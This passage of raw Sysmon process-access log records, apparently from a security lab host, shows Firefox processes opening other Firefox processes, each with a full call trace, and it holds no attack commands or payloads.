Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921 10341000x800000000000000016788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 10341000x800000000000000016774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 